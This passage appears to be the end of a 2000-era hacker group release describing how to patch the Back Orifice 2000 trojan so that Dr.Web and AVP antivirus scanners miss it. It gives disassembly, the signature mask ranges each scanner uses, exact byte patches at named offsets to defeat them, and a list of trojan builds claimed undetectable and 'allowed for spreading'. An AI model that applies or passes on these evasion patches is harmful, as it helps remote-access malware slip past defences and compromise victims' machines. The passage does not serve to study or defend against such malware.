push eax 00001F72: 56 push esi 00001F73: E8B0000000 call 000002028 -------- (3) 00001F78: 83C414 add esp,014 00001F7B: 895D08 mov [ebp][00008],ebx 00001F7E: 83C33F add ebx,03F ;"?" 00001F81: 3BDF cmp ebx,edi 00001F83: 7319 jae 000001F9E -------- (4) 00001F85: 8B450C mov eax,[ebp][0000C] 00001F88: 8D4418C1 lea eax,[eax][ebx][-003F] 00001F8C: 50 push eax 00001F8D: 56 push esi 00001F8E: E895000000 call 000002028 -------- (1) 00001F93: 83450840 add d,[ebp][00008],040 ;"@" 00001F97: 59 pop ecx 00001F98: 59 pop ecx 00001F99: 83C340 add ebx,040 ;"@" 00001F9C: EBE3 jmps 000001F81 -------- (2) 00001F9E: 33C0 xor eax,eax 00001FA0: EB04 jmps 000001FA6 -------- (3) 00001FA2: 83650800 and d,[ebp][00008],000 00001FA6: 8B4D08 mov ecx,[ebp][00008] 00001FA9: 8B550C mov edx,[ebp][0000C] 00001FAC: 2BF9 sub edi,ecx 00001FAE: 03CA add ecx,edx 00001FB0: 57 push edi 00001FB1: 8D443018 lea eax,[eax][esi][00018] 00001FB5: 51 push ecx 00001FB6: 50 push eax 00001FB7: E89E090000 call 00000295A -------- (4) 00001FBC: 83C40C add esp,00C drWeb mask 1E11 to 1E1A (any byte) AVP mask 1EC0 to 1F90 (may be any byte) drWeb patch : 00001E11: A3B45C0010 mov [010005CB4],eax <- exchange it 00001E16: 6A01 push 001 <- (drWeb) 00001E18: 58 pop eax AVP patch : 00001F35: 8BD7 mov edx,edi <- exchange it 00001F37: 8BC1 mov eax,ecx <- (AVP) all patches was checked, but not enough! the best checking = using it everyday ;-) II. S0luti0n trust no1, and never trust antivirus companies :-)) antivirus patch for back orifice 2000 patch descripti0n unlimited group ============================================================================= unlimited gr0up Home Page: http://infected.ilm.net/unlg/ Our Web Site: http://infected.ilm.net/ the biggest security Web Site: http://packetstorm.securify.com/ c0nfidential c0ntacts: 0nly "real life" chat n0t c0nfidential c0ntacts: undernet#c0de or unlg@hotmail.com PGP Key: i hate PGP and 0ther crappy t00lz XoR crypting rules! ;-) Security public discussi0n: packetst0rm or b1nary illusi0n Greetz: SGWW, UCL, uCF, SoS, 29A and other kewl ppl! ======================================================-[2000-01-13 UnlG]-==== second addon end ________________ lastest releases bo120p09 netbus160_p4 do not detectable by: drweb 4.17, AVP 3.0 b132, Norton Antivirus 5.0 (and i wish 2000 too) sophos 3.29/AH enjoy..... checked: allowed for spreading... cheers, ..fast^patch.. ..b.$. //UnlG.. [e0f]